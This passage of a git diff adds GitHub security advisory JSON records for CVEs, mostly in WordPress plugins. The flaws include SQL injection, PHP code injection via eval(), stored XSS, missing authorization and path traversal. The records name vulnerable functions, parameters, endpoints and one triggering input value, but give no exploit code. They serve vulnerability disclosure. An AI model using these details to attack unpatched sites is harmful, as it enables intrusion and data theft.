"id": "GHSA-gch6-cfhh-c44p", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2633" + ], + "details": "The Gutenberg Blocks with AI by Kadence WP plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.6.1. This is due to a missing capability check in the `process_image_data_ajax_callback()` function which handles the `kadence_import_process_image_data` AJAX action. The function's authorization check via `verify_ajax_call()` only validates `edit_posts` capability but fails to check for the `upload_files` capability. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary images from remote URLs to the WordPress Media Library, bypassing the standard WordPress capability restriction that prevents Contributors from uploading files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2633" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kadence-blocks/tags/3.5.32/includes/class-kadence-blocks-prebuilt-library.php#L1177" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kadence-blocks/tags/3.5.32/includes/class-kadence-blocks-prebuilt-library.php#L789" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3454881%40kadence-blocks%2Ftrunk&old=3453204%40kadence-blocks%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9c06e0a9-a13a-4cee-a1a5-c43c114b2dbf?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gmgx-8hxg-f53q/GHSA-gmgx-8hxg-f53q.json b/advisories/unreviewed/2026/02/GHSA-gmgx-8hxg-f53q/GHSA-gmgx-8hxg-f53q.json new file mode 100644 index 0000000000000..5bafb011047c5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gmgx-8hxg-f53q/GHSA-gmgx-8hxg-f53q.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gmgx-8hxg-f53q", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-1943" + ], + "details": "The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via settings in all versions up to, and including, 4.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Shop Manager-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1943" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/src/Controllers/TemplateController.php#L194" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/templates/elements/order-details.php#L123" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/templates/elements/text.php#L38" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3460087%40yaymail&new=3460087%40yaymail&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/73b4e5a2-bf75-4df9-a816-2cc858947c39?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T08:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gxvp-w433-832f/GHSA-gxvp-w433-832f.json b/advisories/unreviewed/2026/02/GHSA-gxvp-w433-832f/GHSA-gxvp-w433-832f.json new file mode 100644 index 0000000000000..0677cdb9d52e9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gxvp-w433-832f/GHSA-gxvp-w433-832f.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gxvp-w433-832f", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-1831" + ], + "details": "The YayMail - WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized plugin installation and activation due to missing capability checks on the 'yaymail_install_yaysmtp' AJAX action and `/yaymail/v1/addons/activate` REST endpoint in all versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to install and activate the YaySMTP plugin.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1831" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/src/Ajax.php#L183" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/src/Controllers/AddonController.php#L76" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yaymail/trunk/src/Ajax.php#L183" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3460087%40yaymail&new=3460087%40yaymail&sfp_email=&sfph_mail=#file11" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a568162a-5a2d-47ab-9dfe-2f2f5f324f0d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T08:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h92c-7ccr-x4hr/GHSA-h92c-7ccr-x4hr.json b/advisories/unreviewed/2026/02/GHSA-h92c-7ccr-x4hr/GHSA-h92c-7ccr-x4hr.json new file mode 100644 index 0000000000000..67544cd09a67d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h92c-7ccr-x4hr/GHSA-h92c-7ccr-x4hr.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h92c-7ccr-x4hr", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-1860" + ], + "details": "The Kali Forms plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.4.8. This is due to the `get_items_permissions_check()` permission callback on the `/kaliforms/v1/forms/{id}` REST API endpoint only checking for the `edit_posts` capability without verifying that the requesting user has ownership or authorization over the specific form resource. This makes it possible for authenticated attackers, with Contributor-level access and above, to read form configuration data belonging to other users (including administrators) by enumerating form IDs. Exposed data includes form field structures, Google reCAPTCHA secret keys (if configured), email notification templates, and server paths.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1860" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kali-forms/tags/2.4.8/Inc/Backend/Rest/class-forms-rest-controller.php#L116" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kali-forms/tags/2.4.8/Inc/Backend/Rest/class-forms-rest-controller.php#L251" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kali-forms/tags/2.4.8/Inc/Backend/Rest/class-forms-rest-controller.php#L62" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3460047/kali-forms/trunk?contextall=1&old=3435823&old_path=%2Fkali-forms%2Ftrunk" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a1529c89-5c5e-4a2d-be31-b55d2907c9b6?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T08:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jh7f-pj8r-h37c/GHSA-jh7f-pj8r-h37c.json b/advisories/unreviewed/2026/02/GHSA-jh7f-pj8r-h37c/GHSA-jh7f-pj8r-h37c.json new file mode 100644 index 0000000000000..529876aa4f7e3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jh7f-pj8r-h37c/GHSA-jh7f-pj8r-h37c.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jh7f-pj8r-h37c", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-1655" + ], + "details": "The EventPrime plugin for WordPress is vulnerable to unauthorized post modification due to missing authorization checks in all versions up to, and including, 4.2.8.4. This is due to the save_frontend_event_submission function accepting a user-controlled event_id parameter and updating the corresponding event post without enforcing ownership or capability checks. This makes it possible for authenticated (Customer+) attackers to modify posts created by administrators by manipulating the event_id parameter granted they can obtain a valid nonce.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1655" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/tags/4.2.8.1/includes/class-ep-ajax.php#L741" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/tags/4.2.8.1/includes/class-ep-ajax.php#L798" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/trunk/includes/class-ep-ajax.php#L741" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/trunk/includes/class-ep-ajax.php#L798" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3455239%40eventprime-event-calendar-management%2Ftrunk&old=3452796%40eventprime-event-calendar-management%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0e2a2769-1309-4aad-8411-4445efea2b66?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T08:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p572-g32f-hp32/GHSA-p572-g32f-hp32.json b/advisories/unreviewed/2026/02/GHSA-p572-g32f-hp32/GHSA-p572-g32f-hp32.json new file mode 100644 index 0000000000000..0a3cb7dbead1e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p572-g32f-hp32/GHSA-p572-g32f-hp32.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p572-g32f-hp32", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2296" + ], + "details": "The Product Addons for Woocommerce – Product Options with Custom Fields plugin for WordPress is vulnerable to Code Injection in all versions up to, and including, 3.1.0. This is due to insufficient input validation of the 'operator' field in conditional logic rules within the evalConditions() function, which passes unsanitized user input directly to PHP's eval() function. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject and execute arbitrary PHP code on the server via the conditional logic 'operator' parameter when saving addon form field rules.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2296" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-custom-product-addons/tags/3.0.19/includes/process/conditional-logic.php#L104" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-custom-product-addons/tags/3.0.19/includes/process/conditional-logic.php#L84" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-custom-product-addons/trunk/includes/process/conditional-logic.php#L104" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-custom-product-addons/trunk/includes/process/conditional-logic.php#L84" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3458823%40woo-custom-product-addons&new=3458823%40woo-custom-product-addons&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c1edd7-2421-4dfa-8775-ca0497759d52?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q7cc-x725-hp7g/GHSA-q7cc-x725-hp7g.json b/advisories/unreviewed/2026/02/GHSA-q7cc-x725-hp7g/GHSA-q7cc-x725-hp7g.json new file mode 100644 index 0000000000000..454dd1a293821 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q7cc-x725-hp7g/GHSA-q7cc-x725-hp7g.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q7cc-x725-hp7g", + "modified": "2026-02-18T09:31:03Z", + "published": "2026-02-18T09:31:03Z", + "aliases": [ + "CVE-2026-1807" + ], + "details": "The InteractiveCalculator for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'interactivecalculator' shortcode in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1807" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/interactivecalculator/tags/1.0.1/interactivecalculator.php#L44" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3456849%40interactivecalculator&new=3456849%40interactivecalculator&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3456870%40interactivecalculator&new=3456870%40interactivecalculator&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5c38f080-59c7-4201-9e87-87ee9ab6b97b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q7wp-4j7p-g4vj/GHSA-q7wp-4j7p-g4vj.json b/advisories/unreviewed/2026/02/GHSA-q7wp-4j7p-g4vj/GHSA-q7wp-4j7p-g4vj.json new file mode 100644 index 0000000000000..0c1f57574dbb5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q7wp-4j7p-g4vj/GHSA-q7wp-4j7p-g4vj.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q7wp-4j7p-g4vj", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2419" + ], + "details": "The WP-DownloadManager plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.69 via the 'download_path' configuration parameter. This is due to insufficient validation of the download path setting, which allows directory traversal sequences to bypass the WP_CONTENT_DIR prefix check. This makes it possible for authenticated attackers, with Administrator-level access and above, to configure the plugin to list and access arbitrary files on the server by exploiting the file browser functionality.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2419" + }, + { + "type": "WEB", + "url": "https://github.com/lesterchan/wp-downloadmanager/commit/416b9f5459496166c0395f9e055d4c4cf872404a" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-downloadmanager/tags/1.69/download-options.php#L42" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-downloadmanager/trunk/download-options.php#L42" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0bb96da1-9c17-4264-ac29-b5ff8dec745d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T08:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json b/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json new file mode 100644 index 0000000000000..8b16527cca469 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qfwf-756h-2p4g", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2644" + ], + "details": "A weakness has been identified in niklasso minisat up to 2.2.0. This issue affects the function Solver::value in the library core/SolverTypes.h of the component DIMACS File Parser. This manipulation of the argument variable index with the input 2147483648 causes out-of-bounds read. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2644" + }, + { + "type": "WEB", + "url": "https://github.com/niklasso/minisat/issues/55" + }, + { + "type": "WEB", + "url": "https://github.com/niklasso/minisat/issues/55#issue-3832527387" + }, + { + "type": "WEB", + "url": "https://github.com/niklasso/minisat" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346406" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346406" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752775" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qj9g-q4j9-47hp/GHSA-qj9g-q4j9-47hp.json b/advisories/unreviewed/2026/02/GHSA-qj9g-q4j9-47hp/GHSA-qj9g-q4j9-47hp.json new file mode 100644 index 0000000000000..7321ce7053113 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qj9g-q4j9-47hp/GHSA-qj9g-q4j9-47hp.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qj9g-q4j9-47hp", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2112" + ], + "details": "The Dam Spam plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.8. This is due to missing nonce verification on the pending comment deletion action in the cleanup page. This makes it possible for unauthenticated attackers to delete all pending comments via a forged request granted they can trick an admin into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2112" + }, + { + "type": "WEB", + "url": "https://github.com/webguyio/dam-spam/blob/52e12fb455e7b670af2e0713f9da84d2d1d309ac/settings/cleanup.php#L92" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/dam-spam/tags/1.0.6/settings/cleanup.php#L92" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/dam-spam/trunk/settings/cleanup.php#L92" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3457369%40dam-spam&new=3457369%40dam-spam&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e336dc27-4a76-4197-929c-b221f42bfe69?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T08:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rg7x-c263-823c/GHSA-rg7x-c263-823c.json b/advisories/unreviewed/2026/02/GHSA-rg7x-c263-823c/GHSA-rg7x-c263-823c.json new file mode 100644 index 0000000000000..1ce5960d7bf73 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rg7x-c263-823c/GHSA-rg7x-c263-823c.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rg7x-c263-823c", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2495" + ], + "details": "The WPNakama – Team and multi-Client Collaboration, Editorial and Project Management plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the '/wp-json/WPNakama/v1/boards' REST API endpoint in all versions up to, and including, 0.6.5. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2495" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpnakama/tags/0.6.5/inc/class-wpnakama-api.php#L209" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpnakama/tags/0.6.5/inc/class-wpnakama.php#L215" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpnakama/trunk/inc/class-wpnakama-api.php#L209" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpnakama/trunk/inc/class-wpnakama.php#L215" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3461315%40wpnakama&new=3461315%40wpnakama&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7ffa92be-9d38-40d9-954d-d890136b5aa1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T09:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wxhm-86c2-x66c/GHSA-wxhm-86c2-x66c.json b/advisories/unreviewed/2026/02/GHSA-wxhm-86c2-x66c/GHSA-wxhm-86c2-x66c.json new file mode 100644 index 0000000000000..2364f3a755ee7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wxhm-86c2-x66c/GHSA-wxhm-86c2-x66c.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wxhm-86c2-x66c", + "modified": "2026-02-18T09:31:03Z", + "published": "2026-02-18T09:31:03Z", + "aliases": [ + "CVE-2026-1640" + ], + "details": "The Taskbuilder – WordPress Project Management & Task Management plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 5.0.2. This is due to missing authorization checks on the project and task comment submission functions (AJAX actions: wppm_submit_proj_comment and wppm_submit_task_comment). This makes it possible for authenticated attackers, with subscriber-level access and above, to create comments on any project or task (including private projects they cannot view or are not assigned to), and inject arbitrary HTML and CSS via the insufficiently sanitized comment_body parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1640" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/taskbuilder/tags/5.0.2/includes/admin/projects/open_project/wppm_submit_project_comment.php#L6" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/taskbuilder/tags/5.0.2/includes/admin/tasks/open_task/wppm_submit_task_comment.php#L6" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/66095908-875f-486d-ae77-6015671872de?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xf7v-j2cc-2crf/GHSA-xf7v-j2cc-2crf.json b/advisories/unreviewed/2026/02/GHSA-xf7v-j2cc-2crf/GHSA-xf7v-j2cc-2crf.json new file mode 100644 index 0000000000000..be96604f860ee --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xf7v-j2cc-2crf/GHSA-xf7v-j2cc-2crf.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xf7v-j2cc-2crf", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-1941" + ], + "details": "The WP Event Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_events' shortcode in all versions up to, and including, 1.8.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1941" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/tags/1.8.7/includes/class-wp-event-aggregator-cpt.php#L56" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/tags/1.8.7/includes/class-wp-event-aggregator-cpt.php#L567" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/tags/1.8.7/includes/class-wp-event-aggregator-cpt.php#L761" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/trunk/includes/class-wp-event-aggregator-cpt.php#L56" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/trunk/includes/class-wp-event-aggregator-cpt.php#L567" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/trunk/includes/class-wp-event-aggregator-cpt.php#L761" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3455440/wp-event-aggregator#file18" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/50d8f1e0-2022-4fe1-b384-ca762a032d3c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T09:15:58Z" + } +} \ No newline at end of file From 624ae4cb87ec63f45622fd36ef58c9a94b7a2d4d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 12:32:38 +0000 Subject: [PATCH 003/174] Publish Advisories GHSA-23h7-68rq-jgvf GHSA-2pc4-pm2m-q53r 